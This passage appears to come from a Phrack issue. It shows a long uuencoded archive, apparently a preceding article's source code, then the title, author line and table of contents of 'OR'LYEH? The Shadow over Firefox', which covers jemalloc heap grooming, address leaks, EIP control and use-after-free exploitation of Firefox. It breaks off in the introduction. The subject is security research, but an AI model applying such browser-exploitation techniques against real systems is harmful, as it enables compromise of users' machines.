MG5,)NUR\AU0[.:D9!GO]NCV=MCT/`20@F..R$%C::.ZZ@&;-]$#*3!W7,'4K
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
17]*7]"4]?OK_3&K!K@#(````
`
end



--------------------------------------------------------------------------------


                           ==Phrack Inc.==

               Volume 0x0f, Issue 0x45, Phile #0x0e of 0x10

|=-----------------------------------------------------------------------=|
|=----------------=[ OR'LYEH? The Shadow over Firefox ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ argp ]=---------------------------------=|
|=-----------------------=[ argp@grhack.net ]=---------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

1 - Introduction
2 - Firefox and SpiderMonkey internals
  2.1 - Representation in memory
  2.2 - Generational garbage collection (GGC)
  2.3 - jemalloc (and GGC)
3 - Firefox's hardening features
  3.1 - PresArena
  3.2 - jemalloc heap sanitization
  3.3 - Garbage collection
  3.4 - Sandbox
4 - The shadow (over Firefox) utility
5 - Exploitation
  5.1 - ArrayObjects inside ArrayObjects
  5.2 - jemalloc feng shui
  5.3 - xul.dll base leak and our location in memory
  5.4 - EIP control
  5.5 - Arbitrary memory leak
  5.6 - Use-after-free bugs
6 - Conclusion
7 - References
8 - Source code

--[ 1 - Introduction

In this paper I will elaborate and expand on my Infiltrate 2015 talk of
the same title [INF]. Even a full hour-long conference talk is hardly
